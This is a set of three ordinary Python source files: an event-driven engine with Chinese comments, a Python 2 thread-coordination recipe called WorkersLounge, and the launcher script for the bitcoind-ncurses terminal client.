# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __onTimer(self):
"""向事件队列中存入计时器事件"""
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timer.start(2500)
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timer.stop()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
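# A minimal usage sketch of the engine above (illustrative only, not part of the
# original module). It assumes a Qt event loop is running so the QTimer can fire,
# and that EVENT_TIMER comes from the star import of myquant.event.eventType.
def _example_engine_usage():
    engine = EventEngine()
    def on_timer(event):
        # Every handler takes a single Event object, as required by the class docstring.
        print("timer event received:", event.type_)
    engine.register(EVENT_TIMER, on_timer)
    engine.start()  # spawns the worker thread and starts the QTimer
    engine.put(Event(type_=EVENT_TIMER))  # events can also be pushed manually
    sleep(2)
    engine.stop()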
########################################################################
class EventEngine2(object):
"""
    Event-driven engine whose timer runs in a plain Python thread instead of a QTimer.
"""
# ----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target=self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target=self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
# ----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block=True, timeout=1) # 获取事件的阻塞时间设为1秒
# if event.type_ is not EVENT_TIMER:
print("event.type_:", event.type_)
self.__process(event)
except Empty:
pass
# ----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
# for handler in self.__handlers[event.type_]:
# handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
# ----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
# ----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timerActive = True
self.__timer.start()
# ----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
# ----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
# ----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
# ----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
# ----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
# ----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
        self.type_ = type_  # event type
        self.dict_ = {}  # dict holding the event payload
#----------------------------------------------------------------------
def test():
"""测试函数"""
import sys
from datetime import datetime
# from qtpy.QtCore import QCoreApplication
ee = EventEngine2()
def simpletest(event):
        print(u'Handling timer event fired every second: {}'.format(str(datetime.now())))
def put():
while True:
print('put')
event = Event()
event.type_ = 'abc'
ee.put(event)
sleep(1.5)
def abc(event):
print('abc:',123)
# app = QCoreApplication(sys.argv)
ee.register(type_='abc', handler=abc)
# ee.registerGeneralHandler(simpletest)
ee.start()
put()
# app.exec_()
# Run this script directly to test
if __name__ == '__main__':
test()
|
recipe-577350.py
|
import threading
class WorkersLounge(object):
def __init__(self, total_workers_number):
"""
@param total_workers_number: the maximum number of worker threads
"""
self.total_workers_number = total_workers_number
self.waiting_place = threading.Condition()
self.work_done_event = threading.Event()
def rest(self):
"""
When a thread calls this method there are two possible options:
- either there are other active threads, in which case the current thread waits
- all other threads are already waiting, in which case they all exit
@return: True if the caller thread should go back to work
False if the caller thread should exit
"""
with self.waiting_place:
if (len(self.waiting_place._Condition__waiters) ==
self.total_workers_number-1):
# This is the last worker, and it has nothing to do
self.work_done_event.set()
self.waiting_place.notifyAll()
# Notify the caller there is no more work to do
return False
else:
# Wait for a signal
self.waiting_place.wait()
return not(self.work_done_event.isSet())
def back_to_work(self):
"""
Wake up all the waiting threads.
Should be called whenever a thread puts new input into the common source.
"""
# Wake up everybody
with self.waiting_place:
self.waiting_place.notifyAll()
if __name__ == "__main__":
# Run test code
import Queue
import time
print_lock = threading.Lock()
def sync_print(text):
with print_lock:
print text
def _thread_proc(input_queue, workers_lounge):
thread_name = threading.currentThread().name
while 1:
try:
# Attempt to get input from the common queue
input = input_queue.get(timeout=0.1)
# Do something with the input, possibly inserting more jobs
# back into the queue
sync_print("%s got input %s"%(thread_name, input))
time.sleep(1)
if (input < 5):
input_queue.put(input+1)
input_queue.put(input+1)
# Wake up any waiting thread
workers_lounge.back_to_work()
except Queue.Empty:
# The 'rest' method returns False if the thread should stop,
# and blocks until someone wakes it up
sync_print("%s is resting"%thread_name)
if (workers_lounge.rest() == False):
sync_print("%s finished working"%thread_name)
break
# Create an initial input source
input_queue = Queue.Queue()
input_queue.put(1)
input_queue.put(1)
# Run worker threads
threads_number = 5
workers_lounge = WorkersLounge(total_workers_number=threads_number)
    threads = []
    for _i in range(threads_number):
        threads.append(
            threading.Thread(target=_thread_proc, args=(input_queue, workers_lounge)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
main.py
|
#!/usr/bin/env python
###############################################################################
# bitcoind-ncurses by Amphibian
# thanks to jgarzik for bitcoinrpc
# wumpus and kylemanna for configuration file parsing
# all the users for their suggestions and testing
# and of course the bitcoin dev team for that bitcoin gizmo, pretty neat stuff
###############################################################################
import multiprocessing, argparse, signal
import global_mod as g
import rpc
import interface
import config
def interrupt_signal(signal, frame):
s = {'stop': "Interrupt signal caught"}
interface_queue.put(s)
def debug(rpc_queue):
# coinbase testnet transaction for debugging
#s = {'txid': "cfb8bc436ca1d8b8b2d324a9cb2ef097281d2d8b54ba4239ce447b31b8757df2"}
# tx with 1001 inputs, 1002 outputs
s = {'txid': 'e1dc93e7d1ee2a6a13a9d54183f91a5ae944297724bee53db00a0661badc3005'}
rpc_queue.put(s)
if __name__ == '__main__':
# initialise queues
interface_queue = multiprocessing.Queue()
rpc_queue = multiprocessing.Queue()
# parse commandline arguments
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config",
help="path to config file (i.e. bitcoin.conf|litecoin.conf)",
default="bitcoin.conf")
parser.add_argument("-m", "--mode",
help="coin mode, either BTC (default), BCH, BSV, BTG, or LTC",
default="BTC")
args = parser.parse_args()
# get coin mode
try:
g.coinmode = args.mode.upper()
except:
g.coinmode = g.get_default_coinmode()
g.init_coinmode()
# parse config file
try:
cfg = config.read_file(args.config)
except IOError:
cfg = {}
s = {'stop': "configuration file [" + args.config + "] does not exist or could not be read"}
interface_queue.put(s)
# initialise interrupt signal handler (^C)
signal.signal(signal.SIGINT, interrupt_signal)
# start RPC thread
rpc_process = multiprocessing.Process(target=rpc.loop, args = (interface_queue, rpc_queue, cfg))
rpc_process.daemon = True
rpc_process.start()
#debug(rpc_queue)
# main loop
interface.main(interface_queue, rpc_queue)
# ensure RPC thread exits cleanly
rpc_process.join()
|